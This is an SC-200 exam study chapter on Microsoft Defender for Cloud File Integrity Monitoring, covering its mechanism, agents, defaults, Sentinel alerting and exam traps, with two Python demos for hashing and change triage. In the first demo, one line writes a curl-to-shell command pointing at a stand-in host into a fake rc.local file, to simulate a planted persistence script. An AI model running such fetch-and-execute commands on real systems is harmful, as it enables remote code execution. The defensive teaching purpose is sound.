This chapter covers File Integrity Monitoring (FIM) in Microsoft Defender for Cloud and Defender for Servers, a topic the SC-200 exam places under objective 3.1: Configure and manage Defender for Cloud. FIM is a detective control that records changes to critical files, registry keys, and other system components. Exam questions on FIM cover how it is enabled, the data it produces, and its integration with other Defender features and Microsoft Sentinel. Understanding FIM's mechanism, defaults, and common pitfalls matters both for the exam and for real-world security operations.
File Integrity Monitoring (FIM) works like a museum security guard who keeps a detailed inventory of every artifact's condition on a clipboard. On every patrol, the guard walks through the museum and compares each artifact against the clipboard. If a statue is slightly turned, a painting frame is chipped, or a display case glass is cracked, the guard notes the change, takes a timestamped photo, and radios the control room. The guard does not judge whether the change is good or bad, only that a change occurred. Similarly, FIM takes a cryptographic hash (a unique fingerprint) of critical files and records the state of critical registry keys. Then, at each collection cycle, it recalculates the hash and compares it with the previous inventory. Any mismatch produces a change record with details such as which file changed, when, and the old and new hash. Just as the guard cannot prevent a thief from breaking in but can detect the aftermath, FIM does not prevent file changes but records them for investigation. The guard's effectiveness depends on the accuracy of the initial inventory and the frequency of patrols; a theft that is cleaned up between two patrols goes unnoticed. Likewise, FIM's value relies on a clean baseline, a tracked-entity list that covers what matters, and a clear understanding of the collection cadence (which the product fixes, not you) when reasoning about what it can and cannot see.
What is File Integrity Monitoring (FIM)?
File Integrity Monitoring (FIM) is a security feature in Microsoft Defender for Cloud (formerly Azure Security Center) that tracks critical system files, Windows registry keys, and other configuration files for changes. FIM surfaces modifications that could indicate a breach, such as malware altering system binaries, an attacker adding an autostart entry as a backdoor, or a misconfiguration that weakens security posture. FIM requires the Microsoft Defender for Servers Plan 2, and it is available for Azure VMs and for on-premises and multicloud servers connected via Azure Arc.
How FIM Works Internally
FIM records a cryptographic hash (SHA-256) of each monitored file together with its attributes, and the state of each monitored registry key, and compares each new inventory against the previous one. Any difference is written to a Log Analytics workspace as a change record. The original implementation was built on the Change Tracking and Inventory solution and the Log Analytics agent (MMA); the current implementation collects the same kind of data through the Microsoft Defender for Endpoint sensor. The process involves several components:
Baseline: The first inventory of the tracked files and registry keys. Take it when the system is in a known good state (for example, right after a clean build and patching), because FIM can only report that something differs from the previous inventory, not whether that earlier state was trustworthy.
Collection interval: How often the agent re-inventories tracked items. In the MMA-based solution this was fixed by Microsoft (Windows files every 30 minutes, Linux files every 15 minutes, Windows registry every 50 minutes) and was not user-configurable; the MDE-based implementation is event-driven through the sensor rather than polled.
Hash algorithm: SHA-256 over file content. Attribute changes (size, permissions, owner) are recorded as a separate change even when the content hash is unchanged, so an ACL change on a sensitive file still produces a record.
Comparison engine: The agent (MMA, or the Defender for Endpoint sensor in the current implementation) compares the new inventory against the previous one and sends change records to the Log Analytics workspace, where they appear in the ConfigurationChange table (MMA) or the MDCFileIntegrityMonitoringEvents table (current) and in the File Integrity Monitoring dashboard in Defender for Cloud. FIM does not raise security alerts on its own; alerting is built on top of the table with a log alert rule or a Microsoft Sentinel analytics rule.
Key Components, Values, and Defaults
Monitored Items: By default, FIM tracks a Microsoft-recommended set of entities, including:
Windows: logon and boot-related binaries such as C:\Windows\explorer.exe, C:\Windows\System32\userinit.exe and C:\Windows\regedit.exe, legacy configuration files such as C:\Windows\win.ini and C:\Windows\system.ini, and autostart and security registry keys such as HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, RunOnce, and keys under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet.
Linux: system binaries in /bin, /sbin, /usr/bin and /usr/sbin, the login and passwd binaries, /boot, and configuration under /etc such as /etc/*.conf, /etc/crontab and /etc/init.d. Account files such as /etc/passwd and /etc/shadow are common custom additions where the defaults do not already cover them.
Collection Intervals: fixed by the product and not configurable per workspace or VM. In the MMA-based solution: Windows files every 30 minutes, Linux files every 15 minutes, Windows registry every 50 minutes. There is no Azure Policy parameter for the interval.
Retention: change records follow the workspace retention setting (30 days by default for a Log Analytics workspace, 90 days when Microsoft Sentinel is enabled on it). Retention can be raised per workspace or per table.
Workspace: FIM data is written to a Log Analytics workspace. With the MMA-based solution FIM was enabled per workspace; with the current implementation you choose the destination workspace in the Defender for Servers plan settings. Choose the workspace region for data-residency reasons rather than performance.
Agent: originally the Log Analytics agent (MMA, installed as the MicrosoftMonitoringAgent extension on Windows and OmsAgentForLinux on Linux). The Azure Monitor Agent (AMA) variant only reached preview and was withdrawn, and MMA has been retired, so the current FIM requires the Defender for Endpoint sensor (deployed by Defender for Servers as the MDE.Windows or MDE.Linux extension).
Configuration and Verification Commands
FIM is not switched on per VM, and there is no dedicated built-in Azure Policy for it; it is enabled in Defender for Cloud once the subscription has Defender for Servers Plan 2. To enable FIM:
Current implementation: Environment settings > select the subscription > Defender plans > Servers > Settings > File Integrity Monitoring > On, then choose the Log Analytics workspace that will receive the events. Azure Policy still has a role: Defender for Cloud's agent auto-provisioning, which is policy-driven, installs the required agent on every VM and Arc-enabled server in scope.
MMA-based implementation (retired): Defender for Cloud > Workload protections > File Integrity Monitoring, select the workspace and choose Enable; this added the Change Tracking solution to that workspace.
Verify via Defender for Cloud > Workload protections > File Integrity Monitoring, where each onboarded workspace shows the number of reporting machines and the recent changes.
To check which agent extensions are installed on a VM, use Azure CLI:
az vm show --name MyVM --resource-group MyRG --query "resources[?type=='Microsoft.Compute/virtualMachines/extensions'].{name:name, state:provisioningState}" -o table
Or PowerShell:
Get-AzVMExtension -ResourceGroupName MyRG -VMName MyVM | Select-Object Name, ProvisioningState
Look for MicrosoftMonitoringAgent (Windows) or OmsAgentForLinux (Linux) for the retired Log Analytics agent, AzureMonitorWindowsAgent or AzureMonitorLinuxAgent for AMA, and MDE.Windows or MDE.Linux for the Defender for Endpoint sensor that the current FIM uses. For Arc-enabled servers, use az connectedmachine extension list instead of az vm show.
FIM changes are not security alerts, so the alert list will not contain them; query the ConfigurationChange (MMA) or MDCFileIntegrityMonitoringEvents (current) table in Log Analytics instead. To list the security alerts Defender for Cloud does raise:
az security alert list --subscription MySubscription
Interaction with Related Technologies
Defender for Cloud: FIM changes appear in the File Integrity Monitoring dashboard and in the workspace table, not under Security alerts. Connect the same workspace to Microsoft Sentinel and write an analytics rule over the change table to turn selected changes into incidents.
Azure Policy: policies (including Defender for Cloud auto-provisioning, which is policy-based) deploy the agent at scale; the FIM switch itself lives in the Defender for Cloud plan settings.
Azure Automation: FIM has no built-in revert. An Automation runbook or Logic App triggered from a Sentinel incident can redeploy a known-good copy of a file, but that is automation you build, not a FIM feature.
Microsoft Defender for Endpoint (MDE): the MDE sensor already streams file and registry events into advanced hunting (DeviceFileEvents, DeviceRegistryEvents) in near real time, and the current Defender for Cloud FIM reuses that sensor as its data source. The exam may ask you to distinguish MDE's endpoint telemetry from the FIM feature in Defender for Cloud.
Important Exam Notes
FIM is not a prevention tool and, in its MMA-based form, not real time: a change shows up only after the next collection cycle, and a file that is modified and restored between two cycles leaves no record.
FIM does not prevent changes; it only detects them.
FIM produces noise during legitimate patching. Track only what matters and correlate with change-management data in your alert rule; the product has no way to "suppress" a change record.
The collection interval is fixed by the product; an exam answer that lets you set it is a distractor.
FIM originally required the Log Analytics agent (MMA). MMA is retired and the AMA-based preview was withdrawn; the current FIM uses the Defender for Endpoint sensor. Expect agent questions to turn on this migration.
FIM requires Defender for Servers Plan 2. Plan 1 (Defender for Endpoint integration only) and the free tier do not include it.
Step-by-Step: How FIM Processes a Change
Baseline Capture: on first collection the agent inventories every tracked file and registry key, recording the SHA-256 content hash and attributes. The inventory is held by the agent; what reaches the workspace is the stream of changes.
Collection: at each cycle (fixed interval for MMA; event-driven for the MDE sensor) the agent re-inventories the tracked items.
Comparison: the new inventory is compared with the previous one.
Change Detection: each difference becomes a record with the path or key, the change category (Added, Modified, Removed, or an attribute change), the previous and current hash, and the timestamp. The MMA-based solution did not capture which user made the change; pair it with Windows object-access auditing (Security event IDs 4656/4663, which need a SACL on the file) or with MDE file events if attribution is required.
Record Ingestion: the record lands in the Log Analytics workspace (ConfigurationChange or MDCFileIntegrityMonitoringEvents) and in the FIM dashboard. No security alert or severity is assigned automatically; an Azure Monitor log alert rule or a Sentinel analytics rule assigns severity when it fires.
Investigation: SOC analysts review the record in the FIM dashboard, in Log Analytics, or in a Sentinel incident, and decide whether the change was authorized.
Tuning: there is no "accept change" or stored-baseline reset. If a change is expected and recurring, narrow the tracked entities (disable that file or key in the FIM settings) or exclude it in the analytics rule.
Common Misconfigurations
Too Broad Scope: Tracking too many files (wide wildcards, recursive directories) causes noise and performance issues. Stick to the default entities plus a short list of deliberate additions.
Expecting Instant Detection: MMA-based collection is periodic, so a change that is made and reverted between two cycles is invisible; design detections with that window in mind.
Ignoring False Positives: Not tuning tracked entities or rule filters after legitimate changes leads to alert fatigue.
Agent Not Installed or Not Healthy: FIM stops when the agent stops, and machines still on the retired Log Analytics agent produce nothing.
Exam Focus: SC-200 Objective 3.1
SC-200 tests FIM under objective 3.1: Configure and manage Defender for Cloud. Specific sub-objectives include:
Configure file integrity monitoring (FIM)
Interpret FIM alerts
Integrate FIM with Microsoft Sentinel
The exam expects you to know:
That collection intervals are fixed by the product, not tunable
The agent requirements, including the move from the Log Analytics agent to the Defender for Endpoint sensor
How to enable FIM in Defender for Cloud (per subscription in the plan settings, or per workspace in the retired MMA version)
How to view FIM changes and build alerts on them
The difference between FIM in Defender for Cloud vs. Defender for Endpoint's own file and registry telemetry
Common trap questions: - "Which agent is required for FIM?" (Answer: historically the Log Analytics agent; today the Defender for Endpoint sensor, since MMA is retired and the AMA preview was withdrawn) - "How often does FIM check registry keys?" (Answer: on a product-fixed schedule, 50 minutes in the MMA-based solution; it cannot be changed) - "Can FIM be enabled on on-premises servers?" (Yes, via Azure Arc) - "Does FIM prevent changes?" (No, only detects)
Summary
File Integrity Monitoring in Defender for Cloud is a passive detective control that compares cryptographic hashes and attributes of tracked files and registry keys between successive inventories. It is enabled in Defender for Cloud once Defender for Servers Plan 2 is on the subscription, collects through an agent (the Log Analytics agent originally, the Defender for Endpoint sensor today), writes change records to a Log Analytics workspace, and relies on Sentinel analytics rules or log alert rules for alerting. Key exam points: collection intervals are fixed by the product; FIM requires Plan 2; FIM detects but never blocks. Understanding its mechanism, defaults, and integration points is critical for the SC-200 exam.
Enable FIM in Defender for Cloud
To enable FIM, the subscription needs Defender for Servers Plan 2. In Defender for Cloud open Environment settings, select the subscription, open Defender plans, choose Settings on the Servers plan, set File Integrity Monitoring to On and select the Log Analytics workspace that will receive the events. In the retired MMA-based version you instead opened Workload protections > File Integrity Monitoring, selected a workspace and chose Enable. Agent deployment to existing and future machines is handled by Defender for Cloud auto-provisioning, which is implemented with Azure Policy, so agent coverage can be checked in the Azure Policy compliance view. There is no policy parameter for collection intervals because they are not configurable.
Agent Installation and Baseline Creation
FIM requires the supported agent on the machine: the Log Analytics agent (MMA) for the retired version, the Defender for Endpoint sensor for the current one. Auto-provisioning installs it if it is absent. Once FIM is enabled, the agent takes an initial inventory of all tracked files and registry keys (SHA-256 content hash plus attributes) that becomes the reference for the first comparison. Take this inventory when the system is in a known good state; FIM cannot tell you whether the starting point was already compromised.
Periodic Collection and Hash Comparison
At each collection cycle (MMA-based: Windows files every 30 minutes, Linux files every 15, Windows registry every 50; MDE-based: as the sensor observes events), the agent recalculates the SHA-256 hash and attributes of each tracked item and compares them with the previous inventory. If nothing differs, nothing is sent. If something differs, a change record is produced with the path or key, the change category, the old and new hash, and the timestamp. The user who made the change is not part of the MMA-based record; enable object-access auditing (Windows Security event IDs 4656/4663 with a SACL on the file) or use MDE file events if attribution is required.
Alert Generation and Notification
When a change is detected, the agent sends the record to the Log Analytics workspace (ConfigurationChange for MMA-based FIM, MDCFileIntegrityMonitoringEvents for the current implementation), and Defender for Cloud shows it in the File Integrity Monitoring dashboard. FIM does not generate a security alert or assign a severity by itself. To be notified, create an Azure Monitor log alert rule on the table, or connect the workspace to Microsoft Sentinel and write an analytics rule; the rule sets the severity and can send email, run a Logic App, or open an incident.
Investigation and Response
SOC analysts investigate the change in the FIM dashboard, in Log Analytics, or in the Sentinel incident, and determine whether it was authorized (a software update) or malicious (a rootkit, or a new autostart value). If malicious, they start incident response: isolate the device through Defender for Endpoint, collect evidence, and restore the file from a trusted source (for example through an Azure Automation runbook or the deployment pipeline). FIM itself neither reverts files nor offers an "accept" action.
Tuning and Maintenance
There is no stored-baseline "accept change" operation: FIM always compares with the previous inventory, so a one-off authorized change produces one record and then goes quiet. Recurring noise is handled by editing the tracked entities in the FIM settings (remove or narrow a file path or key, use wildcards sparingly) and by excluding known-good activity in the analytics rule. Regular maintenance includes reviewing change records after each patch cycle, confirming that agents still report (the Heartbeat table), and revisiting the tracked-entity list as the server estate changes.
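The inventory-compare cycle described above (How FIM Works Internally, Step-by-Step, and the Agent Installation through Tuning sections), as an added Python example that is not Microsoft code and calls no Azure API: it hashes a small set of constructed files in a temporary directory, takes a baseline inventory, applies a content change, an attribute-only change, a deletion, a new file and a modify-then-revert, and then produces change records of the same shape FIM writes (category, old and new hash). All paths, file contents and record field names are invented for the example; what it shows beyond the prose is that the revert inside one cycle leaves no record, which is the blind spot of polled collection.

```python
"""Toy file-integrity monitor: inventory, compare, emit change records.

Added example, not Microsoft code. Paths, file contents and record field
names are constructed here; real FIM writes ConfigurationChange (MMA) or
MDCFileIntegrityMonitoringEvents (current) rows to a Log Analytics workspace.
"""
import hashlib
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    """What the agent keeps per tracked file: content hash plus attributes."""
    sha256: str
    size: int
    mode: int  # permission bits only (stat.S_IMODE)


def hash_file(path, chunk=65536):
    """SHA-256 of the file content, streamed so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(tracked_paths):
    """Inventory every tracked path that currently exists as a regular file.

    A tracked path that does not exist is simply absent from the inventory;
    its later appearance is reported as Added, its disappearance as Removed.
    """
    inventory = {}
    for p in tracked_paths:
        if os.path.isfile(p):
            st = os.stat(p)
            inventory[p] = Entry(hash_file(p), st.st_size, stat.S_IMODE(st.st_mode))
    return inventory


def compare(previous, current):
    """Diff two inventories into change records (one per changed entity)."""
    changes = []
    for p in sorted(set(previous) | set(current)):
        old, new = previous.get(p), current.get(p)
        if old is None:
            changes.append({"path": p, "category": "Added", "old_hash": None, "new_hash": new.sha256})
        elif new is None:
            changes.append({"path": p, "category": "Removed", "old_hash": old.sha256, "new_hash": None})
        elif old.sha256 != new.sha256:
            changes.append({"path": p, "category": "Modified", "old_hash": old.sha256, "new_hash": new.sha256})
        elif old != new:  # same content, different size/mode: attribute-only change
            changes.append({"path": p, "category": "AttributesChanged",
                            "old_hash": old.sha256, "new_hash": new.sha256})
    return changes


def run_demo():
    """One collection cycle over constructed files; returns {basename: category}."""
    with tempfile.TemporaryDirectory() as d:
        def path(name):
            return os.path.join(d, name)

        for name, body in {"hosts": b"127.0.0.1 localhost\n",
                           "sshd_config": b"PermitRootLogin no\n",
                           "crontab": b"# empty\n",
                           "flaky": b"v1\n"}.items():
            with open(path(name), "wb") as f:
                f.write(body)
            os.chmod(path(name), 0o644)  # pin the mode so the demo is umask-independent
        tracked = [path(n) for n in ("hosts", "sshd_config", "crontab", "flaky", "rc.local")]
        baseline = snapshot(tracked)

        # Between two cycles: one content change, one ACL-style change, one deletion,
        # one new file, and one file changed and put back before the next inventory.
        with open(path("sshd_config"), "wb") as f:
            f.write(b"PermitRootLogin yes\n")
        os.chmod(path("hosts"), 0o600)
        os.remove(path("crontab"))
        with open(path("rc.local"), "wb") as f:
            f.write(b"curl http://example.invalid/x | sh\n")
        with open(path("flaky"), "wb") as f:
            f.write(b"v2\n")
        with open(path("flaky"), "wb") as f:
            f.write(b"v1\n")  # reverted inside the cycle: no record will exist for it

        return {os.path.basename(c["path"]): c["category"]
                for c in compare(baseline, snapshot(tracked))}


if __name__ == "__main__":
    for name, category in sorted(run_demo().items()):
        print(f"{category:<17} {name}")
```

Running it lists sshd_config as Modified, hosts as AttributesChanged, crontab as Removed and rc.local as Added; flaky never appears, because the comparison only sees the two inventories, not what happened in between. That is why the text recommends pairing FIM with event-driven endpoint telemetry for hosts where a transient change matters.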
Enterprise Scenario 1: Financial Services Compliance
A large bank uses FIM to meet the PCI DSS change-detection requirement (11.5 in v3.2.1, 11.5.2 in v4.0), which mandates file integrity monitoring on critical system files with alerting on unauthorized modification. They have thousands of Windows and Linux servers across Azure and on-premises (via Azure Arc). The security team enables Defender for Servers Plan 2 on every subscription (enforced with Azure Policy), lets auto-provisioning deploy the agent, and turns on FIM in the plan settings. Because the collection interval is fixed by the product, for payment-processing hosts they pair FIM with Defender for Endpoint's event-driven file telemetry rather than trying to shorten it. FIM records flow to a workspace connected to Microsoft Sentinel, where an analytics rule turns changes into incidents. Patch cycles are the main source of noise; the rule ignores changes that fall inside an approved change window by joining against a Sentinel watchlist populated from the ticketing system, and anything outside a window opens an incident. The team reviews FIM incidents daily and the tracked-entity list monthly.
Enterprise Scenario 2: Healthcare Organization Ransomware Detection
A hospital uses FIM on file servers and database hosts to detect ransomware that rewrites or renames large numbers of files. A ransomware run shows up as a burst of Modified and Added records (new extensions) for one host within a single collection cycle. They also track autostart registry keys for persistence mechanisms. Because one run changes thousands of files, their Sentinel analytics rule counts file changes per host in a short window and raises one incident per host when the count crosses a threshold, instead of one alert per file. They confirm with Defender for Endpoint's behavioral detections before containing the host. The hospital learned the hard way that FIM only records encryption after the fact and cannot stop it, so detection is paired with tested backups and isolation playbooks.
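Turning change records into something a SOC can act on, as an added Python example (not Microsoft code and not a Sentinel analytics rule) that covers the alert-rule step from Alert Generation and Notification and the two scenarios above: it sets aside records that fall inside an approved change window (the role the Sentinel watchlist plays in the bank scenario) and collapses a burst of file changes on one host into a single finding (the hospital's ransomware case). The rows are constructed; the column names mirror the ConfigurationChange table that MMA-based FIM wrote (TimeGenerated, Computer, ConfigChangeType, ChangeCategory, FileSystemPath, RegistryKey), but the hosts, paths and ticket CHG-1042 are invented.

```python
"""Triage FIM change records: drop approved change windows, collapse bursts.

Added example, not Microsoft code and not a Sentinel analytics rule. Rows are
constructed; column names follow the ConfigurationChange table schema used by
MMA-based FIM (TimeGenerated, Computer, ConfigChangeType, ChangeCategory,
FileSystemPath, RegistryKey). Hosts, paths and ticket CHG-1042 are invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

T0 = datetime(2024, 5, 6, tzinfo=timezone.utc)


def _file_rows(computer, start, count, spacing_s, prefix):
    """Build `count` Modified file records `spacing_s` seconds apart (constructed data)."""
    return [{"TimeGenerated": start + timedelta(seconds=i * spacing_s),
             "Computer": computer, "ConfigChangeType": "Files",
             "ChangeCategory": "Modified", "FileSystemPath": f"{prefix}{i:03d}"}
            for i in range(count)]


SAMPLE_ROWS = (
    # PAYWEB01: five system DLLs rewritten during the 02:00-03:00 patch window
    _file_rows("PAYWEB01", T0 + timedelta(hours=2, minutes=10), 5, 30, r"C:\Windows\System32\patched")
    # FILESRV02: forty share files rewritten in under three minutes (ransomware pattern)
    + _file_rows("FILESRV02", T0 + timedelta(hours=14), 40, 4, r"D:\Shares\Finance\report")
    # DBSRV01: one new autostart value outside any change window (persistence candidate)
    + [{"TimeGenerated": T0 + timedelta(hours=15), "Computer": "DBSRV01",
        "ConfigChangeType": "Registry", "ChangeCategory": "Added",
        "RegistryKey": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater"}]
)

# Approved change windows, the shape a Sentinel watchlist fed from a ticketing system would have.
CHANGE_WINDOWS = [
    {"Computer": "PAYWEB01", "Start": T0 + timedelta(hours=2),
     "End": T0 + timedelta(hours=3), "Ticket": "CHG-1042"},
]


def in_change_window(row, windows):
    """Ticket ID of the window covering this row's host and time, or None."""
    for w in windows:
        if w["Computer"] == row["Computer"] and w["Start"] <= row["TimeGenerated"] < w["End"]:
            return w["Ticket"]
    return None


def find_bursts(rows, window=timedelta(minutes=10), threshold=20):
    """Per host, the largest number of file changes inside any sliding `window`.

    Hosts at or above `threshold` are returned; one finding per host instead of
    one per file is what keeps a ransomware run from becoming an alert storm.
    """
    times_by_host = defaultdict(list)
    for r in rows:
        if r["ConfigChangeType"] == "Files":
            times_by_host[r["Computer"]].append(r["TimeGenerated"])
    bursts = {}
    for host, times in times_by_host.items():
        times.sort()
        lo, best = 0, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:  # slide the left edge forward
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            bursts[host] = best
    return bursts


def triage(rows, windows=CHANGE_WINDOWS):
    """Split records into suppressed (inside an approved window) and actionable,
    then flag burst hosts among the actionable ones."""
    suppressed, actionable = [], []
    for r in rows:
        ticket = in_change_window(r, windows)
        (suppressed if ticket else actionable).append({**r, "Ticket": ticket})
    return {"suppressed": suppressed,
            "actionable": actionable,
            "bursts": find_bursts(actionable)}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print(f"suppressed={len(result['suppressed'])} "
          f"actionable={len(result['actionable'])} bursts={result['bursts']}")
```

On the sample data the five PAYWEB01 records are attributed to CHG-1042 and set aside, FILESRV02 is reported once as a burst of 40 file changes, and the DBSRV01 Run-key addition survives as a single actionable record. The same two operations (a join against a watchlist and a per-host count over a time bin) are what a Sentinel analytics rule over the FIM table would express in KQL.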
Performance Considerations
Agent Overhead: each collection cycle reads and hashes every tracked file. Tracking large directory trees (wide wildcards, recursion) on busy servers costs CPU and disk I/O; the default entity list is sized to be safe.
Workspace Ingestion: Each change generates a log entry. High-change environments (build servers, file shares) can inflate Log Analytics costs. Keep the tracked-entity list tight rather than tracking whole volumes.
Alert Volume: Without tuning of tracked entities and rule filters, a patch cycle can overwhelm the SOC. Correlate with change-management data (a Sentinel watchlist works well) rather than expecting the product to suppress records.
What Goes Wrong When Misconfigured
Too Broad Scope: Tracking temporary directories (e.g., %TEMP%) causes thousands of records per day. Always use the default entities or carefully selected custom paths.
Transient Changes: MMA-based collection is periodic. An attacker who drops a tool, runs it and restores the original file within one cycle produces no record; only event-driven telemetry such as MDE's catches that.
Ignoring Agent Health: If the agent stops, FIM stops. Monitor agent heartbeat via Azure Monitor (the Heartbeat table) and watch for machines that were never migrated off the retired Log Analytics agent.
Not Tuning After Patching: After a patch cycle FIM records every updated binary. Failing to filter known patch activity leads to alert fatigue and missed real threats.
SC-200 Exam Focus on File Integrity Monitoring
This section is the most critical for exam preparation. The SC-200 exam tests FIM under objective 3.1: Configure and manage Defender for Cloud. Specific sub-objectives include:
Configure file integrity monitoring (FIM)
Interpret FIM alerts
Integrate FIM with Microsoft Sentinel
Common Wrong Answers and Why Candidates Choose Them
Wrong: FIM prevents file changes. Candidates confuse detection with prevention. FIM is a detective control, not a preventive one. The exam will offer answers like 'FIM blocks unauthorized modifications' — this is false.
Wrong: FIM cannot use the Microsoft Defender for Endpoint agent. That was true of the original FIM, which needed the Log Analytics agent (MMA). Since MMA's retirement the supported FIM collects through the Defender for Endpoint sensor. Read agent questions for which implementation they describe.
Wrong: FIM polls every hour, or at an interval you configure. The MMA-based solution used fixed intervals (Windows files 30 minutes, Linux files 15 minutes, Windows registry 50 minutes) that could not be changed; the current implementation is event-driven. Any answer offering a tunable interval is a distractor.
Wrong: FIM is available in the free tier or in Defender for Servers Plan 1. FIM requires Plan 2.
Specific Numbers and Terms That Appear on the Exam
Collection: fixed intervals in the MMA-based solution (Windows files 30 min, Linux files 15 min, Windows registry 50 min); event-driven in the current implementation.
Hash algorithm: SHA-256.
Agent: Log Analytics Agent (MMA) in the original; Defender for Endpoint sensor today (the AMA preview was withdrawn).
Enablement: Defender for Cloud plan settings (Defender for Servers Plan 2 > File Integrity Monitoring), not a dedicated Azure Policy.
Severity: none assigned by FIM itself; set by the log alert rule or Sentinel analytics rule you create.
Retention: workspace retention (30 days by default; 90 days on a Sentinel-enabled workspace).
Edge Cases and Exceptions
On-premises servers: FIM can monitor on-premises servers if they are connected via Azure Arc. The exam may ask if FIM works for on-premises — answer is yes, with Azure Arc.
Linux vs. Windows: Default entities differ. Linux defaults center on /bin, /sbin, /usr/bin, /usr/sbin, /boot and configuration under /etc; Windows on a short list of logon and boot binaries, win.ini and system.ini, and autostart and security registry keys.
Custom paths: You can add Windows files, Windows registry keys and Linux files in the FIM settings (per workspace in the MMA version, in the plan's FIM settings today); wildcards are supported for file paths. There is no Azure Policy parameter for custom paths.
Multiple workspaces: In the MMA-based version FIM was enabled per workspace, so VMs reporting to different workspaces needed it enabled on each. In the current version you choose one destination workspace per subscription in the plan settings.
How to Eliminate Wrong Answers
If an answer says MMA-based FIM is real time, it's wrong — that implementation is periodic; only the current MDE-based implementation is event-driven.
If an answer says FIM is enabled per VM, it's wrong — it is enabled per workspace (MMA version) or per subscription in the plan settings, with agents deployed at scale by auto-provisioning.
If an answer says FIM does not require an agent, it's wrong — an agent (today the Defender for Endpoint sensor) is mandatory.
If an answer says FIM is available without Defender for Servers Plan 2, it's wrong — Plan 1 and the free tier do not include it.
Exam Tips
Know that collection intervals are product-fixed, not tunable.
Know the agent requirements, including the migration from the Log Analytics agent to the Defender for Endpoint sensor.
Understand that FIM is a detective control.
Be able to differentiate the FIM feature in Defender for Cloud from Defender for Endpoint's own file and registry telemetry (advanced hunting, event-driven), and know that the current FIM uses the MDE sensor as its source.
Practice interpreting FIM alerts in the Azure portal or via sample alerts.
FIM detects changes by comparing SHA-256 hashes and attributes between successive inventories of tracked files and registry keys.
Collection intervals are fixed by the product (MMA-based: files every 30 minutes on Windows and 15 on Linux, registry every 50 minutes); there is no user setting.
FIM used the Log Analytics Agent (MMA); the current implementation uses the Defender for Endpoint sensor.
FIM is enabled in Defender for Cloud settings under the Defender for Servers Plan 2, not via a dedicated Azure Policy.
FIM is a detective control, not preventive; only the MDE-based implementation is event-driven.
FIM is part of Defender for Servers Plan 2, not Plan 1 or the free tier.
On-premises servers need Azure Arc to use FIM.
After authorized changes, tune tracked entities and rule filters; there is no baseline "accept" operation.
These come up on the exam all the time. Here's how to tell them apart.
Defender for Cloud FIM
Data source: Log Analytics Agent (retired) or, today, the Defender for Endpoint sensor.
Periodic inventory comparison (MMA) or sensor events (current); writes change records to a workspace table.
Enabled per subscription in the Defender for Servers Plan 2 settings (per workspace in the MMA version); agents deployed at scale by auto-provisioning.
Changes in the FIM dashboard and the workspace table; alerts only through rules you build, for example in Sentinel.
Focuses on a curated list of infrastructure files and registry keys.
Defender for Endpoint File and Registry Telemetry
Uses the Microsoft Defender for Endpoint sensor (Sense service).
Near real-time (event-driven, not polling).
Built into MDE; no FIM enablement or Log Analytics workspace needed.
Data in advanced hunting (DeviceFileEvents, DeviceRegistryEvents) and the device timeline; MDE detections raise alerts in the Defender portal and flow to Sentinel through the Defender XDR connector.
Covers endpoint-level activity including processes, network, memory, and every file and key the sensor observes.
Mistake
FIM blocks unauthorized file changes in real time.
Correct
FIM is a detective control, not a preventive one. It detects changes after they occur by comparing successive inventories. It does not block or revert changes; any revert is automation you build, for example an Azure Automation runbook triggered from a Sentinel incident.
Mistake
FIM can never use the Microsoft Defender for Endpoint agent.
Correct
The original FIM in Defender for Cloud required the Log Analytics Agent (MMA). With MMA retired and the AMA preview withdrawn, the current FIM collects through the Defender for Endpoint sensor. The right answer depends on which implementation the question describes.
Mistake
FIM monitors all files on the system by default.
Correct
FIM only monitors a predefined set of critical files and registry keys. You can add custom paths, but the default scope is limited to system files and important configuration locations.
Mistake
FIM lets you set the polling interval (for example, 1 hour for files).
Correct
The MMA-based collection schedule was fixed by Microsoft (Windows files every 30 minutes, Linux files every 15, registry every 50) and the current implementation is event-driven; there is no interval setting. Answers that offer a tunable interval are distractors.
Mistake
FIM is available in the free tier of Defender for Cloud or in Defender for Servers Plan 1.
Correct
FIM requires the Defender for Servers Plan 2. The free tier provides only basic posture assessments, and Plan 1 adds Defender for Endpoint integration, not FIM.
Enable FIM in Defender for Cloud: with Defender for Servers Plan 2 on the subscription, open Environment settings, select the subscription, open Defender plans, choose Settings on the Servers plan, switch File Integrity Monitoring on and pick the Log Analytics workspace. In the retired MMA-based version you enabled it per workspace under Workload protections > File Integrity Monitoring. There is no per-VM switch and no dedicated built-in policy; agents are deployed at scale by auto-provisioning.
Collection intervals are fixed by the product and cannot be customized: in the MMA-based solution, Windows files every 30 minutes, Linux files every 15 minutes and Windows registry keys every 50 minutes; the current MDE-based implementation is event-driven. For exam purposes, remember that there is no interval to configure.
Yes, FIM works on on-premises servers if they are connected to Azure via Azure Arc. The server must run the supported agent (today the Defender for Endpoint sensor, deployed by Defender for Servers) and the subscription must have Plan 2 with FIM enabled.
Defender for Cloud FIM is a curated, inventory-style record of changes to a defined set of files and registry keys, stored in a Log Analytics workspace and shown in the FIM dashboard. Defender for Endpoint's file and registry telemetry is event-driven, covers everything the sensor sees, and is queried in advanced hunting. Both can feed Sentinel. The current FIM uses the MDE sensor as its data source.
Reduce false positives by tracking only the files and keys that matter, removing noisy entities from the FIM settings, and filtering known change windows in your analytics rule (for example with a Sentinel watchlist populated from the change-management system). FIM has no "accept change" operation.
FIM requires the Microsoft Defender for Servers Plan 2. Plan 1 and the free tier of Defender for Cloud do not include it.
Yes, you can add custom Windows files, registry keys and Linux files in the FIM settings. The defaults already cover a recommended set of critical system files and registry keys.